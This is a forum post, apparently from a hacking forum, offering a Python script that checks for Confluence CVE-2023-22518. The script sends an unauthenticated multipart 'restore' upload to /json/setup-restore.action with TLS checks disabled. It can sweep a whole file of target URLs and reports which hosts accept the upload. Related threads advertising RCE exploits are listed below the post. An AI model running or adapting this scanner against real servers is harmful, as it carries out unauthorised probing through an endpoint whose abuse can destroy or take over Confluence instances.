check for Confluence CVE-2023-22518
by joepa - Monday November 13, 2023 at 07:51 PM
#1
import requests import random import string import argparse import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def random_string(length=10):     letters = string.ascii_lowercase     return ''.join(random.choice(letters) for i in range(length)) def post_setup_restore(url):     url = f"{url.rstrip('/')}/json/setup-restore.action"     headers = {         "X-Atlassian-Token": "no-check",         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7"     }     rand_str = random_string()     data = (         "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"         "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"         "true\r\n"         "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"         f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"         f"{rand_str}\r\n"         "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"         "Content-Disposition: form-data; name=\"edit\"\r\n\r\n"         "Upload and import\r\n"         "------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n"     )     try:         response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)         if (response.status_code == 200 and             'The zip file did not contain an entry' in response.text and             'exportDescriptor.properties' in response.text):             print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!")         else:             print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.")     except requests.RequestException as e:         print(f" [*]Error connecting to {url}. Error: {e}") def main():     parser = argparse.ArgumentParser(description="Post setup restore script")     parser.add_argument('--url', help='The URL to target', required=False)     parser.add_argument('--file', help='Filename containing a list of URLs', required=False)     args = parser.parse_args()     if args.url:         post_setup_restore(args.url)     elif args.file:         with open(args.file, 'r') as f:             for line in f:                 url = line.strip()                 if url:                     post_setup_restore(url)     else:         print("You must provide either --url or --file argument.") if __name__ == "__main__":     main()
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 807 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 263 02-06-2026, 07:08 PM
Last Post: hacker0123
  CitrixBleed / CVE-2023-4966 cccp 10 6,799 02-06-2026, 01:36 AM
Last Post: temptest
  WordPress LFI to RCE - CVE-2025-0366 Serious 1 460 02-05-2026, 09:53 AM
Last Post: Sammm89



 Users browsing this thread: 1 Guest(s)